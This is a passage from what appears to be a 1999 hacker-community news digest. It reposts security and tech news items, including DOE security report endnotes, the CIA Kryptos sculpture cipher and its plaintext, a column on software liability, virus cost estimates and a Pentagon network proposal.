18 DOE, “Annual Report to the President on the Status of Safeguards and Security at Domestic Nuclear Weapons Facilities,” September 1996.
19 GAO/RCED-91-12, “Nuclear Safety: Potential Security Weaknesses at Los Alamos and Other DOE Facilities,” October 1990 (U) and GAO/RCED-92-39,
“Nuclear Security: Safeguards and Security Weaknesses at DOE’s Weapons Facilities,” December 13, 1991.
20 GAO/RCED-90-122, “Nuclear Security: DOE Oversight of Livermore’s Property Management System is Inadequate,” April 18, 1990.
21 GAO/”Key Factors Underlying Security Problems at DOE Facilities,” (Statement of Victor S. Rezendes, Director, Energy, Resources and Science Issues,
Resources, Community, and Economic Development Division, GAO, in testimony before the Subcommittee on Oversight and Investigations, Committee on
Commerce, House of Representatives), April 20, 1999.
22 GAO/”Key Factors Underlying Security Problems at DOE Facilities,” (Statement of Victor S. Rezendes, Director, Energy, Resources and Science Issues,
Resources, Community, and Economic Development Division, GAO, in testimony before the Subcommittee on Oversight and Investigations, Committee on
Commerce, House of Representatives), April 20, 1999.
23 Classified DOE report.
24 Hewlett, Richard G. and Francis Duncan, “Atomic Shield, A History of the United States Atomic Energy Commission,” May 1969.
25 GAO/RCED-89-34, “Nuclear Security: DOE Actions to Improve the Personnel Clearance Program,” November 9, 1988.
26 DOE/IG/WR-O-90-02, “Nevada Operations Office Oversight of Management and Operating Contractor Security Clearances,” March 1990.
27 Classified DOE report.
28 DOE/IG/WR-B-91-08, “Review of Contractor’s Personnel Security Clearances at DOE Field Office, Albuquerque,” September 1991.
29 DOE, “Office of Safeguards and Security, Report to the Secretary: Status of Safeguards and Security,” February 1993.
30 DOE, “Office of Safeguards and Security, Status of Safeguards and Security, Fiscal Year 1995,” January 1996.
31 Classified U.S. Government report.
32 Classified DOE report.
33 GAO/RCED-92-39, “Nuclear Security: Safeguards and Security Weaknesses at DOE Weapons Facilities,” December 13, 1991.
34 Classified DOE report.
35 Classified DOE report.
36 DOE, “Office of Safeguards and Security, Status of Safeguards and Security, Fiscal Year 1993,” January 1994 (U).
37 DOE, “Office of Safeguards and Security, Status of Safeguards and Security, Fiscal Year 1994,” January 1995 (U).
38 Classified DOE report.
39 Classified DOE report.
40 Classified DOE report.
41 Classified DOE report.
42 Classified DOE report.
43 New York Times, “Abstract,” August 5, 1977.
44 DOE, “Plutonium: The First 50 Years. United States Plutonium Production, Acquisition, and Utilization from 1944 Through 1994.
45 GAO/RCED-92-39, “Nuclear Security: Safeguards and Security Weaknesses at DOE’s Weapons Facilities,” December 13, 1991.
46 GAO/RCED/AIMD-95-5, “Nuclear Nonproliferation: U.S. International Nuclear Materials Tracking Capabilities are Limited,” December 27, 1994.
47 GAO/AIMD-95-165, “Department of Energy: Poor Management of Nuclear Materials Tracking Capabilities Are Limited,” August 3, 1995.
48 DOE, “Office of Safeguards and Security, Status of Safeguards and Security, Fiscal Year 1995,” January 1996.
49 U.S. Nuclear Command and Control System Support Staff, “Assessment Report: Department of Energy Nuclear Weapons-Related Security Oversight
Process,” March 1998.
50 GAO/RCED-89-31, “Major Weaknesses in Foreign Visitor Controls at Weapons Laboratories,” October 11, 1988.
51 Classified U.S. Goverment report.
52 GAO/RCED-97-229, “Department of Energy: DOE Needs to Improve Controls Over Foreign Visitors to Weapons Laboratories,” September 25, 1997.
53 Classified DOE report.
54 GAO/RCED-97-229, “Department of Energy: DOE Needs to Improve Controls Over Foreign Visitors to Weapons Laboratories,” September 25, 1997
55 GAO/RCED-97-229, “Department of Energy: DOE Needs to Improve Controls Over Foreign Visitors to Weapons Laboratories,” September 25, 1997.
56 DOE, “Response to the Cox Committee Report: The Benefits of Department of Energy International Scientific and Technical Exchange Programs,” April 1999.
57 GAO/RCED-99-19, “Department of Energy: Problems in DOE’s Foreign Visitors Program Persist,” October 6, 1998.
CHAPTER: ASSESSMENTS
1 In April 1997, the FBI Director met with Secretary Pena, who had taken office in March, to deliver a highly critical FBI assessment of DOE’s counterintelligence
program. In June, DOE officials briefed the Special Assistant to the President and Senior Director for Nonproliferation and Export Controls. In July, the FBI
Director and the Director of Central Intelligence expressed serious concern that DOE had not moved to implement the recommendations in the FBI report.
2 The National Counterintelligence Policy Board (NACIPB) was created by a 1994 Presidential Decision Directive to serve as the National Security Council’s
primary mechanism to develop an effective national counterintelligence program. Current core NACIPB members include senior representatives from the Director of
Central Intelligence /Central Intelligence Agency, the Federal Bureau of Investigation, the Department of Defense, the Department of State, the Department of
Justice, the military departments’ CI organizations, the National Security Council, and, as of 1997, the Department of Energy and NSA.
CHAPTER: REORGANIZATION
1 DOE, “Department of Energy First Tier Organizations, Terms of Office,” undated.
2 DOE, Field Fact Book, May 1998.
3 Unclassified organizational data provided by National Reconnaissance Office.
[End]
Conversion to HTML by JYA/Urban Deadline.
See also PDF version of Unclassified Annex: http://jya.com/pfiab-appx.pdf
@HWA
63.0 Terrorists Use the Net
~~~~~~~~~~~~~~~~~~~~~~
June 18th 1999
From HNN http://www.hackernews.com/
contributed by Anonymous
Since everyone else does it terrorists do to. Terrorists
are using the net as a means of communication,
collaboration, and information dissemination. Sharing
technology and spreading information to followers via
the internet has become a necessary way of doing
business. Web sites are new weapons terrorists are
adding to their armory. A good quote from this article,
"We cannot just make a law that will stop them from
using it."
Computer Currents
http://www.currents.net/newstoday/99/06/15/news13.html
Daily News
Terrorism Via The Net
By Erwin Lemuel G Oliva, Metropolitan Computer Times
June 15, 1999
Almost every sector in society has exploited the Internet.
Unfortunately, not everyone has good intentions. Terrorists now
use the Internet as means of communication and collaboration,
said Mike Coldrick, a bomb technician and anti-terrorism expert
from Scotland Yard during the recent ASEAN Defense
Technology Exchange forum in Manila.
"Modern terrorists travel by jet plane, communicate to followers
by satellite telephone, and recruit and spread messages via the
Internet," Coldrick states in a paper he presented during the
forum.
Technology has changed the face of terrorist organizations.
Coldrick noted, saying that there is growing evidence that
terrorists are currently using the latest means of
communication, such as the Internet, to disseminate terrorist
literature and doctrine.
In the same way, terrorist groups also use the Internet to
transfer terrorist technology to other groups all over the world.
"Lately, the Colombian revolutionary group, FARC, have
produced stand off weapons and heavy mortars to a design very
similar to those produced by the Provisional Irish Republican
Army. No doubt this technology was passed on by
PIRA-trained Basques (separatist group from Spain). Or did the
Colombian group find it on the Internet?" asked Coldrick.
Most often terrorist groups are able to create improvised
explosive devices and other weaponry using locally available
materials. In some instances, they buy them from international
black markets. The latter, however, entails a lot of risk, said
Coldrick.
Coldrick laments that despite the advances in technology,
terrorist groups' activities are not generally monitored due to
legal issues such as privacy. "We cannot just make a law that
will stop them from using it," he said.
"It is important for people to exchange information about the
activities of terrorists," he added. The International Association
of Bomb Technicians and Investigators and the World
Explosives Ordinance Disposal (EOD) Foundation, of which
Coldrick is president, actively exchange e-mail and hold
discussion groups over the Net.
"In 41 years of my practice, I'll still find new things on the
Internet," he remarked.Daily News
Terrorism Via The Net
By Erwin Lemuel G Oliva, Metropolitan Computer Times
June 15, 1999
Almost every sector in society has exploited the Internet.
Unfortunately, not everyone has good intentions. Terrorists now
use the Internet as means of communication and collaboration,
said Mike Coldrick, a bomb technician and anti-terrorism expert
from Scotland Yard during the recent ASEAN Defense
Technology Exchange forum in Manila.
"Modern terrorists travel by jet plane, communicate to followers
by satellite telephone, and recruit and spread messages via the
Internet," Coldrick states in a paper he presented during the
forum.
Technology has changed the face of terrorist organizations.
Coldrick noted, saying that there is growing evidence that
terrorists are currently using the latest means of
communication, such as the Internet, to disseminate terrorist
literature and doctrine.
In the same way, terrorist groups also use the Internet to
transfer terrorist technology to other groups all over the world.
"Lately, the Colombian revolutionary group, FARC, have
produced stand off weapons and heavy mortars to a design very
similar to those produced by the Provisional Irish Republican
Army. No doubt this technology was passed on by
PIRA-trained Basques (separatist group from Spain). Or did the
Colombian group find it on the Internet?" asked Coldrick.
Most often terrorist groups are able to create improvised
explosive devices and other weaponry using locally available
materials. In some instances, they buy them from international
black markets. The latter, however, entails a lot of risk, said
Coldrick.
Coldrick laments that despite the advances in technology,
terrorist groups' activities are not generally monitored due to
legal issues such as privacy. "We cannot just make a law that
will stop them from using it," he said.
"It is important for people to exchange information about the
activities of terrorists," he added. The International Association
of Bomb Technicians and Investigators and the World
Explosives Ordinance Disposal (EOD) Foundation, of which
Coldrick is president, actively exchange e-mail and hold
discussion groups over the Net.
"In 41 years of my practice, I'll still find new things on the
Internet," he remarked.
@HWA
64.0 Beat the CIA at their own game? - crypto sculpture cracking
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 18th 1999
From HNN http://www.hackernews.com/
CIA Crypto Sculpture
contributed by lamer
There is an encoded sculpture in the Langley courtyard,
and now there is a public challenge to see if someone in
the general public can crack the code before the CIA
(of course, they have had a 10 year head start).
ABC News
http://www.abcnews.go.com/onair/WorldNewsTonight/wnt9990615_ciacode.html
By John Martin
ABCNEWS.com
L A N G L E Y, Va., June 15 — Behind the Central
Intelligence Agency’s headquarters, there’s a
secret message waiting to be decoded.
To the delight of its creator, artist Jim
Sanborn of Washington, the message
remains a mystery to the agency and the
hundreds of employees who relax in the
courtyard where his sculpture stands. “I
don’t know that it will ever be totally
figured out,” says Sanborn.
Only William Webster, CIA director
at the time the sculpture was erected, was
given the decoded text, and he locked it
in the office safe when he left the agency in 1991.
A Break in the Case
But finally, after all these years, there’s been a break. An
analyst at the agency has deciphered part of the message.
In fact, he’s deciphered two parts of the message.
The CIA public affairs office is quick to point out that
each employee works to unravel the puzzle on his own
time. Presumably, the agency’s computers, or those of the
code-breaking National Security Agency, could unlock the
message in a matter of hours or days.
David Stein, a 38-year-old CIA physicist, working at
home nights and weekends for about 400 hours, has
deciphered all but 97 of the letters.
This is part of what he deciphered: “They used the
earth’s magnetic field. The information was gathered and
transmitted underground to an unknown location.”
What location? If you know the code, the coordinates
are there.
“Thirty-eight degrees, 57 minutes, 6.5 seconds, north.
77 degrees, 8 minutes, 44 minutes west. ID’ed by rows,”
reads Stein. That is the approximate location of the
sculpture.
We showed retired CIA cryptographer Ed Scheidt
Stein’s work. Scheidt says Stein is on the right track. And
he should know — Scheidt is the one who taught the artist
how to encode his message.
As to the section Stein hasn’t been able to solve,
Scheidt says, “That’s still a secret.”
And that’s how the sculptor wants it. “I think it’s
important that every piece of artwork holds one’s attention
for as long as possible,” says Sanborn.
Still, after nine years, the veil has been pulled back
slightly. But the mystery continues, and the CIA says it still
wants the message deciphered, if only to show it enjoys the
challenge.
Your Turn
We invite you to try cracking the code. You can see the full
code at the bottom of this page. Mull it over and then post
your guesses on the message board above or use the board
to discuss things with fellow cryptographers. And then we
will see whether one of our readers can accomplish what
the CIA has not in nearly a decade.
Need a Hint?
We have posted a partial transcript with an interview Stein
to help you. Each day we will post a portion of what Stein
has already deciphered. Look for it at the bottom of the
yellow box.
The Full Code
Left Side
EMUFPHZLRFAXYUSDJKZLDKRNSHGNFIVJ
YQTQUXQBQVYUVLLTREVJYQTMKYRDMFD
VFPJUDEEHZWETZYVGWHKKQETGFQJNCE
GGWHKK?DQMCPFQZDQMMIAGPFXHQRLG
TIMVMZJANQLVKQEDAGDVFRPJUNGEUNA
QZGZLECGYUXUEENJTBJLBQCRTBJDFHRR
YIZETKZEMVDUFKSJHKFWHKUWQLSZFTI
HHDDDUVH?DWKBFUFPWNTDFIYCUQZERE
EVLDKFEZMOQQJLTTUGSYQPFEUNLAVIDX
FLGGTEZ?FKZBSFDQVGOGIPUFXHHDRKF
FHQNTGPUAECNUVPDJMQCLQUMUNEDFQ
ELZZVRRGKFFVOEEXBDMVPNFQXEZLGRE
DNQFMPNZGLFLPMRJQYALMGNUVPDXVKP
DQUMEBEDMHDAFMJGZNUPLGEWJLLAETG
ENDYAHROHNLSRHEOCPTEOIBIDYSHNAIA
CHTNREYULDSLLSLLNOHSNOSMRWXMNE
TPRNGATIHNRARPESLNNELEBLPIIACAE
WMTWNDITEENRAHCTENEUDRETNHAEOE
TFOLSEDTIWENHAEIOYTEYQHEENCTAYCR
EIFTBRSPAMHHEWENATAMATEGYEERLB
TEEFOASFIOTUETUAEOTOARMAEERTNRTI
BSEDDNIAAHTTMSTEWPIEROAGRIEWFEB
AECTDDHILCEIHSITEGOEAOSDDRYDLORIT
RKLMLEHAGTDHARDPNEOHMGFMFEUHE
ECDMRIPFEIMEHNLSSTTRTVDOHW?OBKR
UOXOGHULBSOLIFBBWFLRVQQPRNGKSSO
TWTQSJQSSEKZZWATJKLUDIAWINFBNYP
VTTMZFPKWGDKZXTJCDIGKUHUAUEKCAR
Right side
ABCDEFGHIJKLMNOPQRSTUVWXYZABCD
AKRYPTOSABCDEFGHIJLMNQUVWXZKRYP
BRYPTOSABCDEFGHIJLMNQUVWXZKRYPT
CYPTOSABCDEFGHIJLMNQUVWXZKRYPTO
DPTOSABCDEFGHIJLMNQUVWXZKRYPTOS
ETOSABCDEFGHIJLMNQUVWXZKRYPTOSA
FOSABCDEFGHIJLMNQUVWXZKRYPTOSAB
GSABCDEFGHIJLMNQUVWXZKRYPTOSABC
HABCDEFGHIJLMNQUVWXZKRYPTOSABCD
IBCDEFGHIJLMNQUVWXZKRYPTOSABCDE
JCDEFGHIJLMNQUVWXZKRYPTOSABCDEF
KDEFGHIJLMNQUVWXZKRYPTOSABCDEFG
LEFGHIJLMNQUVWXZKRYPTOSABCDEFGH
MFGHIJLMNQUVWXZKRYPTOSABCDEFGHI
NGHIJLMNQUVWXZKRYPTOSABCDEFGHIJ
OHIJLMNQUVWXZKRYPTOSABCDEFGHIJL
PIJLMNQUVWXZKRYPTOSABCDEFGHIJLM
QJLMNQUVWXZKRYPTOSABCDEFGHIJLMN
RLMNQUVWXZKRYPTOSABCDEFGHIJLMNQ
SMNQUVWXZKRYPTOSABCDEFGHIJLMNQU
TNQUVWXZKRYPTOSABCDEFGHIJLMNQUV
UQUVWXZKRYPTOSABCDEFGHIJLMNQUVW
VUVWXZKRYPTOSABCDEFGHIJLMNQUVWX
WVWXZKRYPTOSABCDEFGHIJLMNQUVWXZ
XWXZKRYPTOSABCDEFGHIJLMNQUVWXZK
YXZKRYPTOSABCDEFGHIJLMNQUVWXZKR
ZZKRYPTOSABCDEFGHIJLMNQUVWXZKRY
H I N T O F T H E D A Y
“Kryptos” Completed Plaintext. Top Half.
BETWEEN SUBTLE SHADING AND THE ABSENCE OF
LIGHT LIES THE NUANCE OF ILLUSION. THEY USED
THE EARTH’S MAGNETIC FIELD. THE INFORMATION
WAS GATHERED AND TRANSMITTED UNDERGROUND
TO AN UNKNOWN LOCATION.
DOES LANGLEY KNOW ABOUT THIS? THEY SHOULD
ITS BURIED OUT THERE SOMEWHERE. ONLY WW.
THIS WAS HIS LAST MESSAGE.
THIRTY-EIGHT DEGREES FIFTY-SEVEN MINUTES SIX
POINT FIVE SECONDS NORTH SEVENTY-SEVEN
DEGREES EIGHT MINUTES FORTY-FOUR SECONDS
WEST ID BY ROWS.
(Bottom Half) SLOWLY DESPARATLY SLOWLY THE
REMAINS OF PASSAGE DEBRIS THAT ENCUMBERED
THE LOWER PART OF THE DOORWAY WAS REMOVED
WITH TREMBLING HANDS I MADE A TINY BREACH IN
THE UPPER LEFT HAND CORNER AND THEN
WIDENING THE HOLE A LITTLE I INSERTED THE
CANDLE AND PEERED IN THE HOT AIR ESCAPING
FROM THE CHANBER CAUSED THE FLAME TO
FLICKER BUT PRESENTLY DETAILS OF THE ROOM
WITHIN EMERGED FROM THE MIST. CAN YOU SEE
ANYTHINGQ?
@HWA
65.0 Pirates of Silicon Valley
~~~~~~~~~~~~~~~~~~~~~~~~~
June 18th 1999
From HNN http://www.hackernews.com/
Pirates of Silicon Valley
contributed by Silicosis
'Pirates of Silicon Valley' airs on TNT this Sunday at
8pm. The show is supposed to detail the history of
Apple & Microsoft. While this info is going to be
plastered everywhere else, it may be worth watching (if
you have nothing better to do, after all, they are old
school hackers.
TNT
http://tnt.turner.com/movies/tntoriginals/pirates/
If you missed this show its available on the web via
the newsgroups, not that I condone such activity - Ed ;)
@HWA
66.0 .mil hacker cartoon
~~~~~~~~~~~~~~~~~~~~
June 18th 1999
From HNN http://www.hackernews.com/
Cartoon
contributed by carole
Here is a rather funny carton, found in a rather
interestingly funny place.
www.nswc.navy.mil
http://www.nswc.navy.mil/ISSEC/Gif/cartoons/hacked.gif
** This url is of course, dead now. Anyone have a copy of
the gif?, i'll check PacketStorm too...
@HWA
67.0 If Software Breaks Who is Liable? .
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 21st 1999
From HNN http://www.hackernews.com/
contributed by Weld Pond
Companies that manufacture toasters, cars, and other
products are liable for defects in their goods but not
software companies. According to the license
agreements you agree to when installing software the
manufacture is not liable for anything. Software is often
shipped with humongous problems that the
manufacturer knew about yet there is no accountability.
Boston Globe
http://www.globe.com/dailyglobe2/171/focus/You_lose_+.shtml
COMMERCE
You lose!
Cars and toasters are expected to work. But bad software is a
norm, and the industry wants to keep it that way
By Charles Palson, 06/20/99
he engine in your new car self-destructs after a five-minute drive. The
dealer later tells you the manufacturer knowingly produced the defect,
but you have to pay for a new engine anyway. That's because the
automakers convinced Congress that consumer protection laws would drive
up car prices beyond the reach of the average buyer, so the laws were
changed to exempt the companies.
Sound like B-grade fiction? Unfortunately, the answer is: not for the
American software industry. Their intention is clearly stated in the licensing
agreement displayed on your monitor when you install new software.
Clicking OK means you agree that the manufacturer bears no responsibility
for defects.
Did you find features that don't work as advertised? Truth-in-advertising
laws don't apply. Did the program erase your hard drive? So what. Did the
manufacturer have prior knowledge of 95 percent of all the defects
beforehand, the industry average? Irrelevant. You might be able to return the
product, but your time, whatever it is worth, is lost. It's the law.
But not according to some courts, which have recently declared these
licenses illegal because they contradict provisions in the Uniform Commercial
Code, the grandfather of all consumer-protection laws. The software
industry, seeing where this liability could lead, now wants to exclude itself
from the minimal consumer protections offered under the code. Its
argument? Perfect or error-free software would be either impossible or too
expensive to produce.
''Perfect'' was carefully chosen for its emotional effect. After all, everyone
knows that achieving perfection is beyond any mortal. But it's a false
argument. The Uniform Commercial Code doesn't mention anything about
perfection; it states in essence that a product should be fit for ordinary use
and conform to printed claims. If other American industries have managed to
conform to the code, why should software be any different?
Several reputable specialists this writer interviewed don't think it should be.
One of these, Ken Johnson, who is director of Minnesota's Rochester
Technology Center, a division of D.H. Andrews Inc., and who is a former
IBM software executive, is sure that software companies can produce
top-quality products.
Johnson should know. He helped manage a now legendary project that
produced the IBM AS400 computer. A huge effort at the time, the
developers delivered on schedule, and any significant defects were fixed in a
timely manner. And the price was reasonable. Actually, counting both direct
and indirect costs, the AS400 still costs significantly less than comparable
products from other companies, and it delivers more reliability.
The lesson is that, contrary to what industry spokesmen claim, high quality at
reasonable prices is indeed possible.
With a few notable exceptions, however, the industry as a whole chooses to
continue producing software riddled with defects that often make a mockery
of extravagant advertising claims.
Microsoft, for example, shows every intention of continuing the practice of
publicizing features that don't necessarily work. Not one word on the
well-known issue can be found in company president Steve Ballmer's recent
lengthy announcement that quality will take center stage. When this writer
questioned spokewoman Marla Polenz on the issue, she couldn't find anyone
to talk about it.
Perhaps nothing more eloquently illustrates the problems in Microsoft than
the fact that it cannot readily use its own flagship business product, NT
Server, for some mission-critical applications, such as shipping, because it is
too unreliable. According to several people close to IBM and Microsoft, the
latter uses AS400s when reliability really counts. Gartner Group studies
tracking computer reliability say that average downtime for NT Servers is
more than a half-hour per day, compared with a fraction of a second for the
AS400. That's a lot of lost revenue in a year.
But it should be emphasized that this is not just a Microsoft problem. Cem
Kaner, lawyer, former software engineer, and nationally known spokesman
on software quality, stresses that the great majority of companies knowingly
issue software with substantial defects. He, along with many other observers,
estimates that software manufacturers already know 95 percent of all the
bugs when they put their programs on the market.
Why the quality gap between IBM and so many other companies?
According to Kaner, the answer in principle is simple: Product quality
sometimes takes a back seat to getting products out the door for immediate
profit. The whole story, however, is more complex. The problem starts at
the beginning of a project when managers invariably underestimate the
development time requirements by a wide margin.
When the projected completion date arrives, pressure builds from anxious
marketing and financial departments that have made commitments based on
the promised date. Often, the product is finally released under pressure
despite defects.
The nature of the problem is well known in the industry. Roger Sherman,
former Microsoft director of testing, acknowledged, for example, that bad
schedules are responsible for most quality problems.
How has IBM largely found a resolution? According to Johnson, the
operative word is experience. Lots of it. Key development personnel at
IBM have carefully worked in different capacities on many successful
projects. These people have acquired through experience the knowledge it
takes to make useful time estimates. They know it is a little more expensive
to take such necessary measures to produce the first product version, but
they also know that, in the long run, it is less expensive because the
considerable costs associated with defects drop dramatically. ''The AS400
development team created and still adheres to meticulous quality practices,''
says Johnson.
A shift to more reliable software will not be easy. In any industry described
by observers as freewheeling, young and brash, the word ''meticulous'' might
as well be Sanskrit. Computer science departments don't teach its practical
meaning, and most software developers lack even the awareness that
quality, accurate scheduling, and reasonable cost are not mutually
contradictory.
But the point remains: Optimal software quality is doable, and any
protestations to the contrary are, well, whining.
Without even the currently minimal penalties under the Uniform Commercial
Code, the industry would have even less incentive to reform itself. Indeed,
some observers, such as Mark Paulk, professor at the computer science
department of Carnegie Mellon University, believe that the code should have
stricter provisions to increase the penalties for poor software quality. If the
industry felt the pain currently only felt by consumers, the pain would be a
positive impetus for change.
This story ran on page E01 of the Boston Globe on 06/20/99.
© Copyright 1999 Globe Newspaper Company.
@HWA
68.0 Trinux Release 0.61
~~~~~~~~~~~~~~~~~~~
June 21st 1999
From HNN http://www.hackernews.com/
contributed by mdfranz
Besides upgrading to glibc2 and Linux kernel 2.2.x,
Trinux 0.61 now offers remote package loading via
wget, updated versions of many of the tools you know
and love (such as nmap and ntop) and new additions
like hping, cgichk, mns, and SAINT (well, at least the
scanner's underneath, who needs the sorry Web/CGI
interface). Just like before, all on 2 floppies and without
disturbing the other operating systems on your PC. The
standard kernel now provides support for the most
common Ethernet cards and with more reliable DHCP
support, booting Trinux from your school/office PC has
never been easier.
Trinux
http://www.trinux.org
69.0 Australia Looks to Increase Local Police Powers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 21st 1999
From HNN http://www.hackernews.com/
contributed by Code Kid
The Electronic Transactions Bill, expected to be
introduced in the Australian Parliament in the spring
session, will give local police departments more
authority when investigating computer crimes. Many
computer crimes involve computer trespass and criminal
damage neither of which has extra-territorial provisions.
This new bill will give police powers to investigate crimes
even when they originate outside their normal
jurisdictions.
The Age
http://www.theage.com.au/daily/990620/news/news11.html
Police may go after interstate
hackers
By DAVID ADAMS
The State Government is considering giving police greater
powers to investigate computer hackers operating from
interstate.
Because hacking normally involves offences of computer
trespass and criminal damage - neither of which has
extra-territorial provisions - police have limited powers to
pursue hackers who attack Victorian companies from
interstate.
Under the Draft Electronic Commerce Framework Bill,
released for public comment in December, it was
proposed that the new offences of unlawful access to
data in a computer and of damaging data in a computer
be introduced into the Victorian Crimes Act 1958.
The draft bill also provided for police in Victoria to
investigate people interstate committing the new offences
provided there was a substantial link to Victoria. The
period of public consultation ended in February. The bill,
since renamed the Electronic Transactions Bill, is
expected to be introduced in Parliament in the spring
session.
A spokesman for the Minister for Information and
Multimedia, Mr Alan Stockdale, said that he could not
disclose what was in the bill until it was presented in
Parliament. But he said there had been considerable
consultation.
The head of the Victoria Police computer crime
investigation squad, Detective Senior Sergeant David
Caldwell, said that it was less common for hackers to
operate across state borders than inside their own state.
He said that most hacking incidents in Victoria were
motivated by curiosity rather than malice but organised
gangs of hackers and individuals were known to
deliberately target companies. Reasons included revenge
or notoriety.
In one case last year, a Glen Waverley man known by
the name of ``Number Crunch'' claimed to have broken
into the computer systems of 1300 companies in all
Australian capital cities in a two-week hacking spree that
caused $130,000 damage.
Each time the man entered a company's computer
system, he left behind a message informing it of its victim
number and asking it to report the invasion to one of two
telephone numbers, those of Melbourne television
Channels 9 and 7.
Detective Senior Sergeant Caldwell said that hacking had
been identified as one of the greatest security threats
facing companies, but some companies still appeared to
have a ``false sense of security''.
Last year, a joint Victoria Police and Deloitte Touche
Tohmatsu survey found that 11per cent of companies
failed to have any security policy in place when
connecting to the Internet.
In the poll of about 90 of Australia's largest companies,
one-third said their computer systems had been attacked
in the previous 12 months. Of those, 58per cent were
attacked from an external source.
Sixty-four per cent of companies said that hacking was
the greatest security concern in the future.
@HWA
70.0 Aussie Gov Downloads Porn
~~~~~~~~~~~~~~~~~~~~~~~~~
June 21st 1999
From HNN http://www.hackernews.com/
contributed by Weld Pond
The Australian Protective Service, similar in function to
the US Secret Service has found that six of its members
downloaded pornography over the internet while on the
job. The Australian Defense Department is conducting
an investigation.
32 Bits Online
http://www.32bitsonline.com/news.php3?news=news/199906/nb199906175&page=1
Australian Govt Security Officers Caught Downloading Porn
Officers in the Australian Protective Service, the Federal Government's protective security agency, are being investigated
after a "routine" sweep found they had downloaded pornography from the Internet while on duty.
The Australian Defence Department is conducting the inquiry into the use of Defence Department
computers in its Canberra headquarters to download pornographic images by six officers, according to
the Australian Broadcasting Corporation (ABC).
A spokesman told the ABC that the incidents were not considered a serious breach of security but an
investigation would ensue, with all APS officers banned from using the department's Internet links while
it is conducted.
The APS is responsible for the protection of Parliament House in Canberra, the residences of the
Prime Minister and the Governor-General, foreign diplomatic missions, airport security and defense
establishments around Australia.
The use of government computers to access pornography on the Internet was highlighted recently by an
adult Website operator. The site owner publicized the Internet domain names of a number of Australian
government agencies, including the Defence Department, that regularly accessed the adult site in
protest at Australian Internet legislation that requires ISPs to block and filter access to material on the
Internet (Newsbytes, May 28, 1999).
@HWA
71.0 Software Glitch or Security Breach
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 21st 1999
From HNN http://www.hackernews.com/
contributed by Weld Pond
When all else fails claim a 'hacker' did it. After some
customers received discounts of as much as 85%,
Microworkz faxed at least one customer claiming that
their security had been breached. Later when contacted
by a reporter they denied it and claimed it was due to a
software problem.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2279360,00.html?chkpt=zdnnstop
72.0 Viruses Cost Companies Big Dough
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 21st 1999
From HNN http://www.hackernews.com/
contributed by nvirB
In the first two quarters of 1999 viruses have costs US
businesses 7.6 billion in lost revenue. Computer
Economics of Carlsbad, California has completed a study
that says the amount can be attributed to computer
downtime and the expense of dealing with the virus
infestations.
Wired
http://www.wired.com/news/news/technology/story/20297.html
Fox Market Wire
http://foxmarketwire.com/061999/virus.sml
Computer Economics, Inc.
http://www.computereconomics.com/
Wired;
Viruses Cost Big Bucks
Wired News Report
12:20 p.m. 18.Jun.99.PDT
Businesses worldwide have lost a total of
US$7.6 billion in the first two quarters of
1999 at the hands of Melissa, the
Explore.Zip worm and other viruses, a
new study finds.
Computer Economics of Carlsbad,
California said the costs resulted from lost
productivity due to computer downtime,
and the expense of dealing with virus
attacks.
The study also predicted that the
frequency of the attacks will continue at
the current rate, and that systems
failures could be more severe.
Computer Economics polled 185 large
companies and totaled their combined
losses.
Michael Erbschloe, vice president of
research for Computer Economics, said
that companies must make an investment
in security to prevent further damage
from viruses.
"We've surveyed people in IT
organizations for the last 12 years,"
Erbschloe said. "We're constantly getting
the response that computer security is
underfunded."
-=-
Fox Market Wire;
Computer Virus Costs to Business Surge
11.09 a.m. ET (1509 GMT) June 19, 1999
NEW YORK — Computer virus and "worm" attacks on information systems
have caused businesses to lose a total of $7.6 billion in the first half of 1999 as a
result of disabled computers, a research firm said Friday
The cost of viruses and worms — computer bugs spread by e-mail that can
cause system shutdowns — was about five times larger in the first six months of
1999 than businesses suffered during all of last year, said Computer Economics
Inc.
The most recent study was based on 185 companies representing 900,000
international users, while the 1998 survey used slightly different methodology,
researcher Michael Erbschloe said.
"The numbers probably came out low," he said. "It is a conservative number in
that not everyone tracks cost, and most companies tend to undercount and
underreport."
He said the $7.6 billion figure represented lost productivity and repair costs
reported by the company. The 1998 figure of about $1.5 billion also included
"intrusions" to corporate systems, in addition to general virus attacks.
Erbschloe said this year's high profile attacks by ExploreZip worm, which erased
computer files and caused the shutdown of some corporate e-mail systems, and
the Melissa virus, which spread quickly but did not destroy data, would only
draw more attacks.
"Hackers don't like to be outdone," he said. "And most companies are
underfunding their security efforts."
-=-
@HWA
73.0 B4B0 Issue 8 Released.
~~~~~~~~~~~~~~~~~~~~~
June 21st 1999
From HNN http://www.hackernews.com/
contributed by tip
The latest and greatest issue of B4B0 has been
released. Articles discuss issues on system/network
security, humor, as well as dementia. Their primary
focus has always been the liberation of normalcy, and
hopefully the redline youth of the world will turn the
new trend in the gospel sound.
B4B0
http://www.b4b0.org
@HWA
74.0 f41th Issue 7
~~~~~~~~~~~~~~
June 21st 1999
From HNN http://www.hackernews.com/
contributed by D4RKCYDE
D4RKCYDE have released f41th issue 7, the 3rd
installment to the magazine. This issue contains even
more than before, with in-depth articles such as '5ESS
Compact Digital Exchanges' and 'Chronus ICMP Packet
Timestamps' with much, much more.
f41th
http://darkcyde.system7.org
75.0 DOD Considers New Network
~~~~~~~~~~~~~~~~~~~~~~~~~
June 22nd 1999
From HNN http://www.hackernews.com/
contributed by dis-crete
In an effort to defend against frequent cyber attacks,
the Pentagon is considering building a new computer
network to handle e-commerce and public web pages,
cutting off existing connections to the Internet. This
follows an increase in the rate of successful attacks on
the Non-Classified Internet Protocol Router Network
(NIPRNET). While a separate network sounds like a good
idea in theory the practicalities of completely separating
NIPRNET from the Internet will not be easy.
Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0621/fcw-newsnetwork-6-21-99.html
JUNE 21, 1999
Cyberattacks spur talk of 3rd DOD network
New network would support e-commerce and public access
to DOD Web sites
BY BOB BREWIN (antenna@fcw.com)<
AND DANIEL VERTON (dan_verton@fcw.com)
As part of a strategy to defend its unclassified networks against relentless
cyberattacks, the Pentagon may establish a new network to handle electronic
commerce and other interactions with the public while cutting off all other
existing connections to the Internet.
